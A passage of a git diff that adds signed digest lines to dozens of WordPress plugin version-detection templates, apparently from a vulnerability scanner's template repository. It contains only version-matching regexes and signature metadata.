4a0a00473045022100f5e7b474cb68615e35d0e04fea9fbc9657de322f74294be3f36d19df67947ac1022012a71739daa6d3062bed9f36db3378c83f828cda969666c8c1d1135bbb80482d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index bedb85a0eb..68db771d7f 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022019b65cde5e1cdf4275990ec3d5f4327336cf6b5c18157b9fc349992e7c628d58022041cf706f591c2d1ecf820948ef9184e047ae7f15e2c4059587c122fdf8597382:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 45bbbc71df..9b39d4a095 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022043cf789668a8c7ae557065aacf8387eb71c06c347980fe85bee4290b6c6e17430220391522378d08493da5bb203f9f704c0fead91274c693c81c01708562300ec31f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 03befac73e..5f24a1820e 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206f87c76b899dcb80165cec7cd2de2d17e9afc84d5bf5de27c1265564276567f0022100b2a26bc7789343be895a2abe1ec40c0bb8686b4e28bb775142ee02da9ff14d84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index e1f0093127..66ee4af24e 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022051a1f6b528f16ac7def9c66b617064851f094be94c11c45fad3b1ed3d997b78102203bbc84c4ce0f9d537d31d282cd17fdb2a67d338e00e12ed1e94b1b722b2bd963:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 0db316d66d..f104fa4c0f 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202c2303acd891c8ceb383ff8029fc4e679a78c5ae533b12364077ebe0505c1629022065d438afefad58bed1a082ebc42103e64f33e2baee26b0e01f41fb502463b54c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 135639253d..3833413b97 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204f2e2f6c8239fe67d7bae70f9a7cadb1a473250ecc48f081667e6a81d94f82c8022025377ad01446fcd5abef4f71a55ad0439189874cd25bd0819ce9e8fc7ac9b8ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 540fbaf9ac..7ad489f6d7 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220180368bde179e8a71b439f26a6fba549825bf3267312afd2da31753e0cf674f70220647a1c5586633b0ed2f0e8826c66b77be9c7a67930a0932aeb570b39295c41c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 7e71b4736f..c59c8d8361 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022055ed4a4145d1b2fec5467852e10b1aa7ac4e83453a06d662759f72e29b441e44022100d2f4ea912075bd288e1f14b5848fee4bd0941ba063d96ede2fe03ecd2b74d46f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 88a70b2478..0d24e97726 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bf0823e443d5e439f3b62ba9cdc76363bf7d49cf879473142a2b2c1108e765f0022100d7844dae997d9d9c877395208779694a845cc4c49685036861208145b54a61ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index fc498e67e6..16eace3dd7 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220763a7412fa00a262d3523c80ab27c364b40a6f6c9899f62e55248b5c2eaf23f802204fea8878154e26eb08f6ba9307d72344a5fee5d2900702eb1f4e1cbaaeba701f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 465aa93d57..7a1060136e 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205a4f176a828dfb99c8345dd560068ee926439585c5fa4020d2da3806e6f3e8a10221008d71121b641367d4cefa8516a2b56f5550089feb02c0431de4669372b7d6db60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a1b0e57a9..6b0f120772 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202ceb36de8b2df0a595ac7ebd38728f7ee467e5dd1a82df6d450723304b299ddb022026dcbd3b4ffe5e822a2d0cbce3bd0f551ca82ef6e533afd78b3ed442df90b476:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index df35e8b415..1b42794836 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210099bfd8211618fd711d3836ac194c174a86ce2970c033a8ce724e9a816d3f97210220423b6feffe83a1ad1a336e3dc46ec86ab35046052f1d71810d309e6fb0c3a742:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 033cc4bc3d..dd20d526f0 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ec4a7ddb6a15827881f3869f3553790dcb3172da477b5c9e8553f93e76939f7702207b35c44bdcaa09cb1d3e4101c311c43cd37963dd0b8bcfc7cb762e2814880552:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 945ab6ad03..00f34d62d0 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e9ad911ec66c461ae2eac637479aab1d277e8ce5285c88ab21ea5fd622269fde0220778d0b81bea568732130dfe287939f9c99942f26e839409a35610fff332e67ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 2072b51ab9..60805981f4 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022019fcf70af688164d9295599d434d4efa933a62ee66a5467afb8fafcc94ff3fa802210098a670d1f8a60cdb704f34aabc198027777f98d366eb7fe6e22431a1689573b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index b509d8cc67..0ccea350fa 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200f6020f389ea6134cde1434cab6aa6f59b735b65314923af1d82933075c0f0db022014f16d038b8da236c3843576de64d50665af4ee3a04f737955cb68e0348b2d99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c984479bde..568f634ddd 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210090327269e4198a022aa22531de559097eb25eb9f78348c00c82f0994b94a44df022031f59feb8e1bd6d22fbeabb786d479c9bf50790a25dc5996eeeced9189ceb32d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index a3870175c7..c6e1c3ab2f 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205dd37766535e8c0791b92158760410ef21077ba4a94af18a48290538a7a0b6c6022100b33c3d3ee3aed377e628335b033a05feb0353be4ed24c19f0a12decabf7749b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index f5f3818ea2..cbe302eba1 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205ab70cd73fc5826d1c79fecf28dfaf68a5c29c9b57ecc69253325952f7b7e15d02207d4314e3223e32d4cf66773de8d4ea3202c7dcf9b02bf8b80f8b77f94503a40d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 7e5b54c12c..569881a071 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d8c9990b430b6dc9bc816fe5fda3fedcbd2d68544a7d5673440db389b2ca759a022100c28b972d556fea54b8b36ea7f03b4202a83b4932c60eab733f4cac688db7424f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 59effd09f6..0bd645902f 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202fcc3a8ee47d80ca1775a5ac5f6e42bc4d2042889598d1a87a0cfeba6e5c80bc0220400e1674b1866de0e377c61a6e3d544d8f78f732c4a0dc873a16be628158efc8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 833207dcff..364cc75d73 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207eea441a69a2b4e70e2ab4af28e9ddcf5dfcf4c0c10755ef77960608294c361a0220677cef534e4b7cb33f894856df1b0809346be20e4cd5374ed7b6e6952b57bc98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index b7ea2d38d1..0ddccb7a15 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009fa2767e64125df2f9534b8eb8ced3c08b2719003c7d8453849c6a2dcb7414d20220324a168249cbd7fadb928f6086f8e5ad25e7012efcb532cadb20accecb1d84f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2131dbe751..11dddce541 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220718441e2d13d56d8ed7b396511f0f26c1585909f00184df1fc7d8271a908cb3a0220401000388a5a7437addc6df3a5b2b9e9d35cdbe21c1a427cc7cad3204b7953ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 73d644c5e4..2d7fba2475 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204ba679cf1e88906414c822d21fd76d4389832800de10ffc3654b3fdc60d2b603022100dfe2e5766433e5da11c2ba9587351b0acead868f27713561cf6611bfc6cfb874:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 7b0593dcb7..1c73839364 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200962734625332f35d38a7d890c3f25e3c7ba40f1635b50105fa0c5bae830ea2a022100e2a8b18164ea4b2d22d8169e4730bfc760d94de40350841054ba92349c2211f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 6f65d087e4..292cfe61bb 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f4a258898eb2b8aacef7790b6c3d65ce40c306ddaff0a662bc392e98300bf4fb02201a91b7a55123b324850c2773db6ecc835c79e86d587ca1ff339f1d81918384f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 783cdd283d..092d6cbf12 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022032dc6d7e988de72fd3245f415e2b648269e9734599403f205497e880070fea250220560b500fda23d3b0cc7740537c29d580e6e8fc49213e737938ee16e8251c7ffc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 05121854b3..d83d9e5522 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009b79524341919468ee90ac514c7ffb061b48623e1a4a16372376d2f5c1af3a00022027d066522674224616b18c10d4e6ff597bf1dae85ab28cf523fb5c2cf5996395:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 72f52edcd4..6f5b4667cb 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207aae0b1e1506c5570ae02b075dfbeb44384905cacd7f30449fb0340d515070ce022100c80f21e17abe706d12f2463a6b4f13201318ad20cefd0c6b4b970459242358bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 4cf45ebd74..6710f8603c 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210089feb8c3d4e40c769554a8bf0027993ccd1a7e2ed9cfcb176f82749612627f080220056e97bc6b839b747d9b8254604c0d6f9ef7311098811647b81287f60fabb0d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 3d6863e074..9bd2a5fcff 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ce403eec2bd414a1d106d9a4cebe6da4c5acea9024adf14c745469d17a2c264202205c990e42a15b2f298b08dfd336bc364dbdbd279c34d321e3823b97a1dbc41027:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 79e2813c5e..96eef35345 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022050abf7d0a80d7b5c00728a9b2cc6b12f5357354ba89625694c24a1c0406aff240221009120734f8471b961d91823eb2a21c76fb4c6b05b36becdbd719394d7d90f1c4c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ab9a0f1ae3..fde28f7060 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e23fb036f84d4666a8a18d57f39397f582d58fbdad5871cbb045b090a292119802204667540039c2e50031be51b6f0438af7d253885263a24d2a5291df9d457f64a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 5d3adf7c27..eca26fbcab 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204fc83c8016daf960394d78607a7cf72497a5d70c7b00b93fd8e07582752cbd59022100f384b9195be98ddaffa9d802c01562c901f202f563ed281909007fc1002814c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index eda1d27f04..b68d65fd0e 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c8cf4b7cdf11ce99937079da911c8a17ffbfda8a6d85ad8e29165cf7d23fedd6022019013656548efc4fa431b72bbb56e5e8d45a61e37adcfa46ed851e02b7c24f74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 16dfc8df5f..b02ff6c0f0 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c9497ce12c289b2c9210762168a67fb680feab6eb1daa126cb04ed354f1c813b022100f5ce991c753689292bfc02025ebc9039c5df2dc2ec801ea1657d576418aa48bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 4b7600ea69..a2b28c7fee 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201251bdfcabc0a14d6012bce7f39e37138e734d39cd27115d0366be60fd17e0990220114f566ea73ca0ed6bcc0a1741816fe1cbefe03365a1fd1d71ba4f42911d60bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 2ccd4dbce8..d794314741 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022012015e7f1c1c9b1f4a40a2f4f4649ecc5b6379a2d39f4d08029e779eed62918802210085107cfc321062e1691e923453592378723ca443c7ddca59a78af372284e833c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 02ceb224d1..c277784495 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d91478dc82e09af49bc65bec09ce14d38775f226996e1c5f5e77ec3566b75f65022100a00e533e5db29da92c214ab5a6ef4bc2554366e3e378f5af02d1931eea962303:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 367d587ce2..980a6f330c 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201523a384dd7872edbef7cbdbcd34f1f82b2e09d15383209f12b40a4b54fadd60022074d5b2cf3980a6ed57767a41e526505b85d60eeaf38e40644dc4f811f8e49f53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index feed730ee0..1a32a32c9b 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c789415cd0c07b9cf505e3296e3635825b5cf0bf56e56d5a5e2a2775d879d73902202f429c33e055f25cc23909eac5a6d60fec3ab6210cdd8874aa61058702c6013b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 9b2841e7ca..66c6f02e93 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200cbf7b2e212684858bc0fcbedfa09e979ed46f39cd1628907a18b5bb1d42e59f022100ae06da34126249ef8495f99ce64d9c2b39a038ac504864f77a8f32c81122e001:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 42be14c5df..5f2cf65692 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d3c491ffbf32d42c91bfb9d75c7713ad46f66ff5cb1433a29e5d283d5350aebf022002277a640b2a47046bed10d5876f9dea1e9a5d0516f8e6673d27f5853f2e636b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 4e0cd86c3f..aa07811add 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220793956e4a35e319bac77323fe6aa47184bfa2d0e08caed4cb6c255e6aa8a78cb022079ed7acd29178e1cdad4792a38f4963b7f8416ca803e77c97c171acd9b13dff6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 59eadc5e6e..16290f846e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 